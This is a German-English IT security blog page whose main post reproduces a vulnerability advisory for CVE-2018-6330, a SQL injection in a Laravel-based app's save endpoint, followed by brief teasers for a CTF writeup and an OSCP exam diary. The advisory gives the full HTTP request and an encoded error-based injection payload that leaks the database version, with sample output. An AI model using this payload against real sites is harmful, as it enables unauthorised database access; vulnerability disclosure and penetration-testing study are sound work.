IT Blog

Active Directory - Exchange - Security News und Anleitungen

CVE-2018-6330 Laravel SQL-Injection

#Exploit Title: Laravel SQLinjection 5.4.15

#Date: 26.01.2018

#Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQLinjection because it is not sanitized inside the save.php. The affected Parameters are dhx_user and dhx_version.

  • Proof of Concept

Login as user, then use the following request:

GET
/save?dhx_user=1516954053138’&dhx_version=1&swt_subdomain=center01
HTTP/1.1
Host:xxxxxx.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:58.0) Gecko/20100101 Firefox/58.0<
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: href=“https://xxxxxxx.net/agenda“>https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

In your Response you will see a:

You have an Error in your Mysql Syntax.

To get the Database Version displayed you can send the following Payload:

dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%282263%2CCONCAT%280x5c%2C0x7171766b71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C21%29%29%2C0x7176787171%29%29–%20WWGj

The Response will look like this:

[…]

<span class=“exception_message“>PDO – sql execution failed<br />

XPATH syntax error: ‚\qqvkq5.7.18-1qvxqq'</span>

[…]

Quaoar CTF writeup

I had nothing to do the last few days so i got a bit of fun time with Quaoar. Thanks to Viper for a nice and simple CTF. You can find my Writeup here

OSCP Prüfung bestanden!

Hier findet Ihr mein Bericht zur Prüfung

OSCP Tag 10 bis Ende / Day 10 till end

Hier findet ihr meinen aktuellen Eintrag zum OSCP

 

Here you can find my new Blogentry for OSCP

OSCP Day 8 – 10

New entry Day 8 – 10 here

Neuer Tagebuch eintrag Tag 8 – 10  hier

OSCP Tagebuch / OSCP Diary Week 1

New entry for my OSCP Diary here

 

Neuer eintrag für mein OSCP Tagebuch hier

OSCP Tagebuch / Diary Day 1-3

Here you can find my work for Day 1-3

OSCP Vorbereitungen / Preparations

Wie ich mich momentan auf den OSCP (Offensive Security Certified Professional) vorbereite erfahrt ihr hier .

OSCP Anmeldung – Check

Ja es ist soweit ich habe mich offiziel für den OSCP von den Machern von Kali registriert. Wie die Anmeldung abläuft erfahrt ihr HIER

 

Einstieg in Penetration Tests ?

Ihr wollt als Pentester starten und wisst nicht wo und wie? Mit dem CSH findet Ihr den perfekten Einstieg als Anfänger. Mehr Informationen HIER.

« Ältere Beiträge

© 2019 IT Blog

Theme von Anders NorénHoch ↑